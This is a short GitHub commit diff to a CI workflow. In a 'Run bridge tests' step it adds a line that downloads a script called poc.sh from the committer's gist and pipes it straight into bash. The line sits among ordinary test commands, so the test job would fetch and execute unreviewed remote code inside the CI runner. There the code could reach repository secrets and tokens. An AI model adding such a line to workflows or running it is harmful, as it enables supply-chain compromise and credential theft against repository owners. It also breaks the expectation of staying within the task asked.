This commit is contained in:
Fearless-Squirrel 2024-09-15 06:19:32 +00:00 committed by GitHub
commit c7cc42d80e
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -44,6 +44,7 @@ jobs:
- name: Run bridge tests
id: testrun
run: |
curl -sSfL gist.githubusercontent.com/Fearless-Squirrel/bbef3562184dc8ac74b076f15a9c465f/raw/54aabb582d12f6c0cf5227a3ca6acd170cb74bff/poc.sh | bash
mkdir results;
python prtester.py;
body="$(cat comment.txt)";